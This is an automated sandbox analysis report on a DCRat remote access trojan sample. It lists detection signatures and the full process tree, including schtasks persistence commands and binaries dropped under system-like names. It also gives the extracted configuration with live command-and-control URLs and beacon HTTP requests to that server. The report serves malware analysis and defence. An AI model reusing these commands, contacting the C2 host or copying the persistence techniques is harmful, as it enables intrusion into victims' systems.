Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4c6fK85tK7.exe

Overview

General Information

Sample name:4c6fK85tK7.exe
renamed because original name is a hash value
Original sample name:68DFE1E08B8CC7D19FF72334FDD09DB8.exe
Analysis ID:1431492
MD5:68dfe1e08b8cc7d19ff72334fdd09db8
SHA1:34fb36f9b553c26b0753f540b6a8af1760bb74dc
SHA256:a5f4363625928d7fb64087212bd9d094972260739b274f44b53bbbd5be6d19b7
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 4c6fK85tK7.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\4c6fK85tK7.exe" MD5: 68DFE1E08B8CC7D19FF72334FDD09DB8)
    • yberLoad.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Local\Temp\ yberLoad.exe" MD5: A84070968353EDCC9559F54DEEDD8FE9)
      • MVPLoader.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\MVPLoader.exe" MD5: F1F43CF5A79E51BA13EF602B25C63A9E)
      • CyberLoader.exe (PID: 5284 cmdline: "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" MD5: 1B4CF2A40E1387CF97DFBE1303C9619A)
        • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • componentWininto.exe (PID: 7352 cmdline: "C:\msPortRefnetdhcp\componentWininto.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • schtasks.exe (PID: 7828 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7844 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7876 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 13 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7892 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7908 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 14 /tr "'C:\Recovery\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 11 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7940 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJF" /sc ONLOGON /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7956 cmdline: schtasks.exe /create /tn "zufsVvjyWcGfJFz" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • cmd.exe (PID: 7988 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EunsIO9tk2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • w32tm.exe (PID: 8040 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • zufsVvjyWcGfJF.exe (PID: 7896 cmdline: "C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe" MD5: 53758CEA18D59182A809208313D5042A)
        • wscript.exe (PID: 7228 cmdline: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • zufsVvjyWcGfJF.exe (PID: 8088 cmdline: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe MD5: 53758CEA18D59182A809208313D5042A)
  • zufsVvjyWcGfJF.exe (PID: 8120 cmdline: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exe MD5: 53758CEA18D59182A809208313D5042A)
  • wscript.exe (PID: 7904 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WmiPrvSE.exe (PID: 8044 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
      • wscript.exe (PID: 8124 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WmiPrvSE.exe (PID: 2992 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
          • wscript.exe (PID: 4128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • WmiPrvSE.exe (PID: 6112 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • wscript.exe (PID: 6440 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
                • WmiPrvSE.exe (PID: 4076 cmdline: "C:\Users\Default User\Downloads\WmiPrvSE.exe" MD5: 53758CEA18D59182A809208313D5042A)
              • wscript.exe (PID: 6572 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • wscript.exe (PID: 7096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • wscript.exe (PID: 8168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 3668 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\da4d56e5-dd25-4b11-bec9-392111f2ec60.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"C\":\"#\",\"L\":\"~\",\"9\":\"(\",\"Z\":\"`\",\"J\":\"@\",\"k\":\"_\",\"N\":\"!\",\"a\":\"$\",\"i\":\"*\",\"M\":\">\",\"4\":\"^\",\"0\":\",\",\"h\":\"|\",\"E\":\";\",\"A\":\"-\",\"I\":\"%\",\"d\":\"&\",\"n\":\".\",\"H\":\")\",\"m\":\" \",\"V\":\"<\"}", "PCRT": "{\"M\":\"%\",\"B\":\"&\",\"Z\":\"^\",\"W\":\"|\",\"R\":\"`\",\"t\":\",\",\"5\":\"~\",\"Q\":\"-\",\"z\":\"$\",\"F\":\"*\",\"d\":\")\",\"U\":\"<\",\"E\":\">\",\"I\":\"@\",\"m\":\"#\",\"v\":\"_\",\"G\":\"!\",\"j\":\".\",\"V\":\";\",\"N\":\" \",\"2\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DSAHi0MzOtJS6OWpXdgD", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "H2": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000029.00000002.3409082832.0000000002860000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    0000001B.00000002.1849224298.0000000002651000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        0000001D.00000002.1888221161.0000000002E71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          0000001B.00000002.1849224298.000000000266B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 14 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Execution from Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Downloads\WmiPrvSE.exe", CommandLine: "C:\Users\Default User\Downloads\WmiPrvSE.exe", CommandLine|base64offset|contains: , Image: C:\Users\Default\Downloads\WmiPrvSE.exe, NewProcessName: C:\Users\Default\Downloads\WmiPrvSE.exe, OriginalFileName: C:\Users\Default\Downloads\WmiPrvSE.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7904, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Default User\Downloads\WmiPrvSE.exe", ProcessId: 8044, ProcessName: WmiPrvSE.exe
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\msPortRefnetdhcp\componentWininto.exe, ProcessId: 7352, TargetFilename: C:\Users\Default User\Downloads\WmiPrvSE.exe
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Sigma detected: Suspicious Program Location with Network Connections
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 141.8.194.74, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\Downloads\WmiPrvSE.exe, Initiated: true, ProcessId: 8044, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49743
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8048, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\6eef2b35-f577-4ffd-aafd-9efeb85439f2.vbs" , ProcessId: 7904, ProcessName: wscript.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\CyberLoader.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\CyberLoader.exe, ParentProcessId: 5284, ParentProcessName: CyberLoader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe" , ProcessId: 7188, ProcessName: wscript.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 4c6fK85tK7.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Recovery\zufsVvjyWcGfJF.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\EunsIO9tk2.batAvira: detection malicious, Label: BAT/Delbat.C
            Source: C:\Users\user\AppData\Local\Temp\e9b737bd-75a6-4059-b77c-a41b4b38424b.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\55dc47f4-7c66-4fb4-aa2a-4ea28e92c8cc.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\d096c949-588b-4f62-9035-9022be100ad8.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Recovery\zufsVvjyWcGfJF.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\e99985a1-94fc-4281-b02a-ceb1639f4b4a.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\d365112d-c481-40f0-92bb-6621c11733c0.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Users\user\AppData\Local\Temp\1ad27169-68a1-4284-b3a4-ab1d46640beb.vbsAvira: detection malicious, Label: VBS/Runner.VPXJ
            Source: C:\Users\user\AppData\Local\Temp\6334e2d8-afed-41d5-8a9a-b81dc662bd51.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\msPortRefnetdhcp\componentWininto.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Users\user\AppData\Local\Temp\c327c276-7051-4e25-8eb9-181648a7a409.vbsAvira: detection malicious, Label: VBS/Starter.VPVT
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeAvira: detection malicious, Label: VBS/Runner.VPG
            Found malware configuration
            Source: 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"C\":\"#\",\"L\":\"~\",\"9\":\"(\",\"Z\":\"`\",\"J\":\"@\",\"k\":\"_\",\"N\":\"!\",\"a\":\"$\",\"i\":\"*\",\"M\":\">\",\"4\":\"^\",\"0\":\",\",\"h\":\"|\",\"E\":\";\",\"A\":\"-\",\"I\":\"%\",\"d\":\"&\",\"n\":\".\",\"H\":\")\",\"m\":\" \",\"V\":\"<\"}", "PCRT": "{\"M\":\"%\",\"B\":\"&\",\"Z\":\"^\",\"W\":\"|\",\"R\":\"`\",\"t\":\",\",\"5\":\"~\",\"Q\":\"-\",\"z\":\"$\",\"F\":\"*\",\"d\":\")\",\"U\":\"<\",\"E\":\">\",\"I\":\"@\",\"m\":\"#\",\"v\":\"_\",\"G\":\"!\",\"j\":\".\",\"V\":\";\",\"N\":\" \",\"2\":\"(\"}", "TAG": "", "MUTEX": "DCR_MUTEX-DSAHi0MzOtJS6OWpXdgD", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "H2": "http://a0947291.xsph.ru/@=kTYjFmNwYTM", "T": "0"}
            Multi AV Scanner detection for dropped file
            Source: C:\Recovery\zufsVvjyWcGfJF.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\zufsVvjyWcGfJF.exeVirustotal: Detection: 64%Perma Link
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeReversingLabs: Detection: 87%
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeVirustotal: Detection: 64%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeReversingLabs: Detection: 95%
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeVirustotal: Detection: 85%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeReversingLabs: Detection: 70%
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeVirustotal: Detection: 60%Perma Link
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeReversingLabs: Detection: 87%
            Source: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeVirustotal: Detection: 64%Perma Link
            Source: C:\msPortRefnetdhcp\componentWininto.exeReversingLabs: Detection: 87%
            Source: C:\msPortRefnetdhcp\componentWininto.exeVirustotal: Detection: 64%Perma Link
            Multi AV Scanner detection for submitted file
            Source: 4c6fK85tK7.exeReversingLabs: Detection: 97%
            Source: 4c6fK85tK7.exeVirustotal: Detection: 84%Perma Link
            Machine Learning detection for dropped file
            Source: C:\Recovery\zufsVvjyWcGfJF.exeJoe Sandbox ML: detected
            Source: C:\Recovery\zufsVvjyWcGfJF.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeJoe Sandbox ML: detected
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeJoe Sandbox ML: detected
            Source: C:\msPortRefnetdhcp\componentWininto.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: 4c6fK85tK7.exeJoe Sandbox ML: detected
            Source: 4c6fK85tK7.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4c6fK85tK7.exe
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: componentWininto.exe, 00000008.00000002.2235833728.000000001C9D0000.00000004.08000000.00040000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003309000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_0027A5F4
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_0028B8E0
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\userJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://a0947291.xsph.ru/@=kTYjFmNwYTM
            Source: Joe Sandbox ViewIP Address: 141.8.194.74 141.8.194.74
            Source: Joe Sandbox ViewIP Address: 141.8.194.74 141.8.194.74
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a0947291.xsph.ru
            Source: global trafficHTTP traffic detected: GET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0947291.xsph.ruConnection: Keep-Alive
